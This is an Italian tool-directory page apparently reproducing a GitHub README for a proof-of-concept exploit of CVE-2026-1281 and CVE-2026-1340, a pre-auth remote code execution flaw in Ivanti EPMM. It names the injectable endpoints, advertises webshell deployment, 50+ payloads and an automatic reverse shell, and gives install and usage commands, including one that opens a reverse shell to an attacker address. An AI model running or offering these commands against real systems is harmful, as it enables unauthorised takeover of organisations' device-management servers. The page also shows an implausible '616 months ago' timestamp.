Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-1281-Ivanti-EPMM-RCE — Proof of Concept per CVE-2026-1281 e CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE tramite Bash Arithmetic Expansion | Kitploit
Strumenti/GitHubGitHub/mehdiledeaut/cve-2026-1281-ivanti-epmm-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubmehdiledeaut/cve-2026-1281-ivanti-epmm-rce

CVE-2026-1281-Ivanti-EPMM-RCE

Proof of Concept per CVE-2026-1281 e CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE tramite Bash Arithmetic Expansion

Vedi Repository
616 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-1281 & CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE

License Python CVSS

⚠️ DISCLAIMER: Questo PoC è fornito esclusivamente a scopo educativo e di ricerca sulla sicurezza. L'utilizzo senza autorizzazione esplicita è illegale.

🎯 Descrizione

Proof of Concept (PoC) completo per lo sfruttamento delle vulnerabilità CVE-2026-1281 e CVE-2026-1340 che interessano Ivanti Endpoint Manager Mobile (EPMM). Queste vulnerabilità consentono l'esecuzione di codice arbitrario da remoto (RCE) senza autenticazione tramite un meccanismo di Bash Arithmetic Expansion.

Vulnerabilità

  • CVE-2026-1281 : Iniezione di codice nell'endpoint /mifs/c/appstore/fob/
  • CVE-2026-1340 : Iniezione di codice nell'endpoint
/mifs/c/aftstore/fob/
  • Punteggio CVSS : 9.8 (Critical)
  • Sfruttamento : Attivo in-the-wild (Zero-Day)
  • 🚀 Funzionalità

    • ✅ Framework di validazione automatizzato (8 test)
    • ✅ Sfruttamento Pre-Auth RCE
    • ✅ Reverse shell automatico
    • ✅ Distribuzione di webshell
    • ✅ 50+ payload pronti all'uso
    • ✅ Script di rilevamento per Blue Team
    • ✅ Documentazione completa

    📦 Installazione

    root@kitploit:~
    git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
    cd CVE-2026-1281-Ivanti-EPMM-RCE
    pip3 install -r requirements.txt
    chmod +x *.py
    

    🎯 Utilizzo Rapido

    root@kitploit:~
    # Test di vulnerabilità
    python3 exploit.py -t https://target.com -c
    
    # Validazione RCE
    python3 exploit.py -t https://target.com --test-rce
    
    # Reverse shell
    python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
    

    📚 Documentazione

    • README completo - Documentazione tecnica dettagliata
    • Guida all'utilizzo - Guida passo passo
    • Payload - Collezione di 50+ payload
    • Guida Red Team - Scenari operativi

    🔗 Riferimenti

    • CERT-FR CERTFR-2026-ALE-001
    • Watchtowr Labs Analysis
    • CVE-2026-1281
    • CVE-2026-1340

    👤 Autore

    Mehdi Le Deaut - Consulente Cybersecurity | Specialista Red Team

    LinkedIn

    ⚖️ Licenza

    Questo progetto è concesso in licenza MIT - vedere il file LICENSE per maggiori dettagli.

    🙏 Ringraziamenti

    • CERT-FR per l'allerta tempestiva
    • Watchtowr Labs per l'analisi tecnica
    • La comunità della cybersecurity
    Scarica lo strumento